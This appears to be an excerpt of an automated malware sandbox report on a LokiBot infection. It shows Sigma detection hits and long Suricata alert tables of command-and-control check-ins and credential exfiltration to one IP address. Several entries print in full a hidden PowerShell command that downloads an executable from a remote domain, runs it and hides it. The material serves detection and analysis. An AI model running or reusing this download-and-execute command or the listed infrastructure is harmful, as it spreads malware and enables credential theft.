Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:49.077565+0200	2024312	1	A Network Trojan was detected	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:50.285873+0200	2024312	1	A Network Trojan was detected	192.168.2.11	49712	45.149.241.169	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:48.138102+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49711	45.149.241.169	80	TCP
2024-10-03T09:20:49.427132+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49712	45.149.241.169	80	TCP
2024-10-03T09:20:50.395968+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:52.138116+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:53.059614+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:55.313220+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:56.544536+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:58.316168+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:20:59.272737+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:00.670903+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:01.623467+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:02.448704+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:03.488048+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:04.428362+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:05.363793+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:06.386274+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:07.265208+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.224949+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:09.172629+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:09.997521+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:10.996788+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:12.112321+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:13.055508+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:13.916854+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:14.881238+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.059969+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:17.083633+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:18.023488+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:19.175709+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:21.592824+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:22.386915+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.246842+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:24.104473+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:25.029228+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.820375+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.851586+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.810227+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.697925+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.591807+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.413511+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.498785+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.743030+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.556187+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.239657+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.487101+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.440836+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.258711+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.499694+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.287566+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:52.148748+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.981934+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:54.007169+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.945256+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.920209+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.220850+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.171912+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:59.151255+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:22:00.075267+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:01.051486+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:03.157629+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:04.115545+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:05.338912+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.283716+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.225458+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:08.313595+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.230403+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.331436+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.239806+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.172123+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:13.068985+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:14.008975+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.936067+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.929179+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.827330+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.703674+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.714301+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.547744+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.566222+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.356699+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.220181+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.369318+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:24.106031+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.910667+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.816016+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.659850+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.504132+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.311778+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.639445+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.646052+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.674682+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.502916+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.340490+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.225001+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:36.015476+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.917140+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.931400+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:38.836712+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.681925+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.614660+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.558183+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.344416+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.251789+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:44.067474+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.11	64449	45.149.241.169	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64437	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64368	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64388	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	49717	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64348	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64371	TCP
2024-10-03T09:20:32.181025+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	49718	TCP
2024-10-03T09:20:51.445072+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	49713	TCP
2024-10-03T09:20:52.900738+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	49714	TCP
2024-10-03T09:20:55.160370+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	49715	TCP
2024-10-03T09:20:59.122929+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	55843	TCP
2024-10-03T09:21:01.459279+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64350	TCP
2024-10-03T09:21:02.297469+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64352	TCP
2024-10-03T09:21:03.202516+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64354	TCP
2024-10-03T09:21:04.268373+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64355	TCP
2024-10-03T09:21:05.205632+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64357	TCP
2024-10-03T09:21:06.216904+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64358	TCP
2024-10-03T09:21:07.101687+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64359	TCP
2024-10-03T09:21:08.062889+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64360	TCP
2024-10-03T09:21:08.918941+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64361	TCP
2024-10-03T09:21:09.844424+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64362	TCP
2024-10-03T09:21:10.841978+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64363	TCP
2024-10-03T09:21:11.926165+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64364	TCP
2024-10-03T09:21:12.885827+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64365	TCP
2024-10-03T09:21:13.771289+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64366	TCP
2024-10-03T09:21:14.606299+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64367	TCP
2024-10-03T09:21:16.922230+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64369	TCP
2024-10-03T09:21:17.872168+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64370	TCP
2024-10-03T09:21:21.433380+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64372	TCP
2024-10-03T09:21:22.239708+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64373	TCP
2024-10-03T09:21:23.095072+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64374	TCP
2024-10-03T09:21:23.953248+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64375	TCP
2024-10-03T09:21:24.880426+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64376	TCP
2024-10-03T09:21:25.674220+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64378	TCP
2024-10-03T09:21:26.693893+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64379	TCP
2024-10-03T09:21:27.639571+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64380	TCP
2024-10-03T09:21:28.553342+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64381	TCP
2024-10-03T09:21:29.437160+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64382	TCP
2024-10-03T09:21:30.264753+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64383	TCP
2024-10-03T09:21:31.218885+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64384	TCP
2024-10-03T09:21:32.603314+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64385	TCP
2024-10-03T09:21:33.391128+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64386	TCP
2024-10-03T09:21:35.071057+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64387	TCP
2024-10-03T09:21:47.328778+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64389	TCP
2024-10-03T09:21:48.285934+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64390	TCP
2024-10-03T09:21:49.095497+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64391	TCP
2024-10-03T09:21:50.342633+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64392	TCP
2024-10-03T09:21:51.142841+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64393	TCP
2024-10-03T09:21:51.992201+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64394	TCP
2024-10-03T09:21:52.829891+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64395	TCP
2024-10-03T09:21:53.827051+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64396	TCP
2024-10-03T09:21:54.795139+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64397	TCP
2024-10-03T09:21:55.749129+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64398	TCP
2024-10-03T09:21:57.080376+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64399	TCP
2024-10-03T09:21:58.015493+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64400	TCP
2024-10-03T09:21:58.973834+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64401	TCP
2024-10-03T09:21:59.929539+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64402	TCP
2024-10-03T09:22:00.880849+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64403	TCP
2024-10-03T09:22:02.998303+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64404	TCP
2024-10-03T09:22:03.932185+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64405	TCP
2024-10-03T09:22:04.926899+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64406	TCP
2024-10-03T09:22:06.119391+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64407	TCP
2024-10-03T09:22:07.070496+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64408	TCP
2024-10-03T09:22:08.024007+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64409	TCP
2024-10-03T09:22:09.073052+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64410	TCP
2024-10-03T09:22:10.010284+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64411	TCP
2024-10-03T09:22:11.084543+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64412	TCP
2024-10-03T09:22:12.009694+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64413	TCP
2024-10-03T09:22:12.898558+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64414	TCP
2024-10-03T09:22:13.862095+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64415	TCP
2024-10-03T09:22:14.782651+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64416	TCP
2024-10-03T09:22:15.769373+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64417	TCP
2024-10-03T09:22:16.672757+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64418	TCP
2024-10-03T09:22:17.541317+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64419	TCP
2024-10-03T09:22:18.559915+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64420	TCP
2024-10-03T09:22:19.384819+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64421	TCP
2024-10-03T09:22:20.373252+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64422	TCP
